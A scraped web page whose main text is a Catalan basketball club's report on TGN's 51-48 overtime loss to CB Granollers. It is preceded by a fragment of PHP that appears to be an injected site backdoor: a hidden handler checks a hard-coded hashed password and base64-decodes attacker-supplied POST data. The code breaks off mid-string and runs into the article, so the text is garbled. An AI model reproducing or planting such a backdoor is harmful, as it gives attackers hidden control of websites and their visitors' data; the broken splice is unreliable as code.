function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La permanència haurà d'esperar pel TGN (51-48) - Tgn Bàsquet Club -

La permanència haurà d’esperar pel TGN (51-48)

Updated: abril 14, 2024

Partit corresponent a la jornada 23 de Supercopa Catalunya femenina, on el Sènior A ha visitat la pista del CB Granollers, equip que arribava amb un balanç de 7 victories i 15 derrotes.

El conjunt lila arribava a la pista del CB Granollers amb l’objectiu d’aconseguir la 4a victòria consecutiva i certificar una permanència molt cara en aquesta competició. Liderades pel gran inici de la capitana Laura Pascual, l’equip entrenat per Israel Esteve va sortir a per feina i va portar el ritme del partit durant els primers 10 minuts, tancant el periode inicial amb un resultat de 9-14.

Al segon quart, la igualtat entre els dos equips es va fer present amb un bonic intercanvi de cistelles que va afavorir a l’equip local, que amb 2 triples consecutius de Judith Moya van deixar el marcador totalment igualat al descans (20-20).

El descans va servir al TGN per recomposar-se i tornar a agafar les regnes del partit. Un parcial de 2-10 de sortida va tornar a demostrar el joc coral de l’equip lila, on totes les jugadores de pista van anotar i van tancar el cèrcol en defensa. El resultat a falta de 10 minuts per la conclusió del partit era de 28-38.

Tot feia indicar que el TGN sumaria la seva 11a victòria a Super Copa, més després de situar-se 11 punts per sobre a falta de poc més de 3 minuts per acabar el partit, però el CB Granollers va apretar línies en la pressió i els nervis van jugar una mala passada a l’equip tarragoní, que va veure com l’aventatge es desfeia en un final per oblidar. Una cistella local als últims segons de partit forçava una pròrroga que seria dominada per un CB Granollers eufòric, alçant-se amb la victòria final per 51-48. La permanència lila haurà d’esperar almenys una setmana més.

A la propera jornada, el TGN rebrà la vista del Cerdanyola CBF, el dissabte 20 d’abril a les 18:00h.